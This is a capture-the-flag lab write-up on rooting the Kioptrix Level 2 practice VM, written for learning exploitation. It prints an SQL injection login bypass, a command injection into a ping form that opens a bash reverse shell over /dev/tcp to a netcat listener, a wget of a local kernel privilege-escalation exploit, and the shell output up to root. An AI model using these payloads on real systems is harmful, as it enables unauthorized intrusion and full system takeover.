Coffee Difficulty Rating:

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Service Enumeration

Port Service Version Detection

TCP: 22


OpenSSH 3.9p1 (protocol 1.99)

TCP: 80


Apache httpd 2.0.52 ((CentOS))

TCP: 111

RPC Bind


TCP: 443


Apache httpd 2.0.52 ((CentOS))

TCP: 631


CUPS 1.1

TCP: 946



TCP: 3306


MySQL (unauthorized)

Web Application Investigation

The web form /index.php was vulnerable to SQL injection, entering the username admin and the password ' or '1'=' successfully bypassed auth.

SQL Injection Auth Bypass

SQL Injection - Why does ' or '1'='1 work ?

The web application is expecting the SQL query: $query = "SELECT * FROM users WHERE username = 'admin' AND password='blah'"; Entering the above injects the statement after the password='blah' and before the closing ";, the entire sql injection query looks like: $query = "SELECT * FROM users WHERE username = 'admin' AND password=' or '1'='1";" 1 = 1 will always be 1, thus the statement will return true, allowing an attacker to authenticate as admin. The above injection statement correctly closes the sql syntax, however it is possible to comment out the rest of the sql statement using: -- -

Command Injection

The above authentication bypass exposed a web form vulnerable to command injection, the form filtering only checks for the presence of the ping command with no filtering to prevent an attacker tacking a comment on the end using ; insert-command-here.

Non privileged shell

A non privileged reverse shell was obtained using:

ping; bash -i >& /dev/tcp/ 0>&1
[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 32770
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Local privilege Escalation

bash-3.00$ uname -ar
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cd /tmp
bash-3.00$ wget --no-check-certificate
           => `9545'
Connecting to||:443... connected.
WARNING: Certificate verification error for unable to get local issuer certificate
WARNING: certificate common name `*' doesn't match requested host name `'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]

    0K .........                                                30.10 MB/s

02:27:58 (30.10 MB/s) - `9545' saved [9785]

bash-3.00$ mv 9545 sock_sendpage.c                             
bash-3.00$ gcc -o sock_sendpage sock_sendpage.c
bash-3.00$ ./sock_sendpage
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Thanks for the VM :)